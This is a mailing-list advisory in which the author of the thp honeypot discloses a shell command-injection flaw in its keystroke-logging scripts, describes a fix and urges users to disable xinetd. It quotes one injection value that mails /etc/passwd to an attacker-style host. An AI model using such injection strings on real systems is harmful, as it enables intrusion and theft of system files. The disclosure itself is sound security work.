There is a vulnerability with the way thp reads data from the inturder's
keystrokes & either logs or returns a response. It allows an attacker to execure
commands on the thp host with user "nobody" privilege.

EXPLANATION
In shell, "read VAR ;echo $VAR > file" seems innocuous at first, however, entering
a value of "$(cat /etc/passwd | mail badguyoops.net -s oops)" will do just that.
Quoting is easily circumvented by including the required closing quotes in the
value entered, thus ineffective.
This problem exists in a number of locations in logthis and thpsvcs.

I'm fixing the problem by using stty to return the keystrokes individualy,
treating carriage returns as a character and returning the prompt on its presence.
 I'll have it posted later today.

Until then, I have shut down the webserver alpinista.dyndns.org:81 and advise any
thp users to turn off xinetd until the fix is available. I'll notify the list
when it is ready.

gb

---------------------------------------------------------------------
To unsubscribe, e-mail: honeypots-unsubscribesecurityfocus.com
For additional commands, e-mail: honeypots-helpsecurityfocus.com
---------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA) Service. For more information on SecurityFocus' SIA service
which automatically alerts you to the latest security vulnerabilities.
Please, see: https://alerts.securityfocus.com/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]